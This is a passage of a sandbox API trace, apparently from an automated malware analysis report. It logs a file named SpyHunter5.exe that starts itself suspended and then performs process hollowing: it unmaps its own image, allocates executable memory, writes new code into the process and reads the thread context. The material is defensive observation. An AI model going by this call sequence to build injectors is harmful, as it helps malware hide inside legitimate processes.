SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.641] GetLastError () returned 0x0 [0069.641] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.642] SetLastError (dwErrCode=0x0) [0069.642] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.644] SetLastError (dwErrCode=0x0) [0069.644] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.645] GetLastError () returned 0x0 [0069.645] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.646] GetLastError () returned 0x0 [0069.646] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.647] SetLastError (dwErrCode=0x0) [0069.647] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.648] SetLastError (dwErrCode=0x0) [0069.648] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.649] GetLastError () returned 0x0 [0069.649] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.650] SetLastError (dwErrCode=0x0) [0069.650] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.651] GetLastError () returned 0x0 [0069.651] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.652] SetLastError (dwErrCode=0x0) [0069.652] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.653] GetLastError () returned 0x0 [0069.653] SetLastError (dwErrCode=0x0) [0069.654] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.654] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.655] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.656] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.656] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.657] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.657] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.658] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.659] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.659] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.660] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.661] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.661] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.662] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.662] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.663] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.664] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.664] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.665] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.666] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.666] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.667] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.668] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.668] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.669] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.670] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.670] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.671] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.671] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.672] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.673] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.673] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.674] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.674] SafeArrayRedim (in: psa=0x588618, psaboundNew=0x18fbb0 | out: psa=0x588618) returned 0x0 [0069.675] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.675] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0069.676] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.676] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0069.676] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x58860c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe")) returned 0x34 [0069.676] GetLastError () returned 0x0 [0069.676] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.676] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\kernel32") returned 0x76c20000 [0069.677] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.677] GetProcAddress (hModule=0x76c20000, lpProcName="MulDiv") returned 0x76c31b80 [0069.677] MulDiv (nNumber=5757008, nNumerator=1, nDenominator=1) returned 5757008 [0069.677] GetLastError () returned 0x0 [0069.677] MulDiv (nNumber=5782520, nNumerator=1, nDenominator=1) returned 5782520 [0069.677] GetLastError () returned 0x0 [0069.677] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.677] LoadLibraryA (lpLibFileName="c:\\windows\\system32\\user32") returned 0x74f40000 [0069.678] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.678] GetProcAddress (hModule=0x74f40000, lpProcName="CallWindowProcW") returned 0x74f60d32 [0069.678] CallWindowProcW (lpPrevWndFunc=0x57d850, hWnd=0x583bf8, Msg=0x588004, wParam=0x1, lParam=0x0) returned 0xa9c [0069.678] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.678] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.678] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.678] GetProcAddress (hModule=0x77130000, lpProcName="NtAllocateVirtualMemory") returned 0x7714fab0 [0069.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18fb58*=0x0, ZeroBits=0x0, RegionSize=0x18fb60*=0x1000, AllocationType=0x1000, Protect=0x40 | out: BaseAddress=0x18fb58*=0x230000, RegionSize=0x18fb60*=0x1000) returned 0x0 [0069.679] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0069.679] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.679] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0069.679] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" " [0069.679] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.679] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0069.679] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.679] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0069.679] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe", lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x230048*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23008c | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" ", lpProcessInformation=0x23008c*(hProcess=0xbc, hThread=0xb4, dwProcessId=0xa9c, dwThreadId=0xaa0)) returned 1 [0069.683] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.683] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.684] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.684] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0069.684] NtUnmapViewOfSection (ProcessHandle=0xbc, BaseAddress=0x400000) returned 0x0 [0069.684] NtAllocateVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x230004*=0x400000, ZeroBits=0x0, RegionSize=0x583d08*=0x8000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x230004*=0x400000, RegionSize=0x583d08*=0x8000) returned 0x0 [0069.685] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.685] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.685] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.685] GetProcAddress (hModule=0x77130000, lpProcName="NtWriteVirtualMemory") returned 0x7714fe04 [0069.685] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x400000, Buffer=0x583bf8*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x583bf8*, NumberOfBytesWritten=0x0) returned 0x0 [0069.685] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x407000, Buffer=0x587bf8*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x587bf8*, NumberOfBytesWritten=0x0) returned 0x0 [0069.685] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x406000, Buffer=0x5873f8*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x0 | out: Buffer=0x5873f8*, NumberOfBytesWritten=0x0) returned 0x0 [0069.685] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x405000, Buffer=0x5871f8*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x5871f8*, NumberOfBytesWritten=0x0) returned 0x0 [0069.686] NtWriteVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x401000, Buffer=0x583ff8*, NumberOfBytesToWrite=0x3200, NumberOfBytesWritten=0x0 | out: Buffer=0x583ff8*, NumberOfBytesWritten=0x0) returned 0x0 [0069.686] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.686] LoadLibraryA (lpLibFileName="ntdll") returned 0x77130000 [0069.686] SetErrorMode (uMode=0x8001) returned 0x8001 [0069.686] GetProcAddress (hModule=0x77130000, lpProcName="NtGetContextThread") returned 0x77150c20 [0069.686] NtGetContextThread (in: ThreadHandle=0xb4, Context=0x23009c | out: Context=0x23009c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, 